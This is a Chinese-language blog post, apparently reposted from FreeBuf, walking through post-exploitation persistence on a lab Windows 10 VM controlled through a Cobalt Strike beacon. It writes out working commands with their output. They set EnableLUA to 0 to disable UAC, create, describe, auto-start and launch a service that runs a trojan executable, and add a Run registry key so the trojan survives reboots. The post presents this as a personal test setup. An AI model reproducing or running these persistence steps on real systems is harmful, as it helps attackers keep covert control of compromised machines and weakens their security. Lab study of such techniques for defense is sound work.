准备环境
windows10 虚拟机
Cobalt Strike【这里部署在Windows10上,服务器置于云上】
过程
远程木马控制了windows10虚拟机,利用Cobalt Strike
在Cobalt Strike下进入beacon
比较说明【可执行文件留持久后门】
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 的值改为0
把这个值改成0,这样在自己的电脑上操作才是真正的administrators
查询注册表信息
shell reg query “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System”
EnableLUA 设置为1
EnableLUA 设置为0
beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe" 【填写自己木马路径】
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "test" "测试" 【设置服务的描述】
[*] Tasked beacon to run: sc description "test" "测试"
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功
beacon> shell sc config "test" start= auto 【设置服务自启动】
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig 成功
beacon> shell net start "test" [启动服务]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:
结果上线!!!
或者
直接插入注册表里,成为自启动文件
继续——添加后门生成
shell reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “calm” /t REG_SZ /d “C:\Users\calmness\calmnexx.exe” /f
重启大法
依旧上线
补充一点:
beacon> shell cmd /k dir [*] Tasked beacon to run: cmd /k dir [+] host called home, sent: 41 bytes [+] received output:
驱动器 C 中的卷没有标签
卷的序列号是 88B7-95BE
C:\Users\calmness\Desktop 的目录
2020/09/21 13:07 <DIR> .
结束!!!
来源:freebuf.com 2020-09-28 19:20:37 by: calmness
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册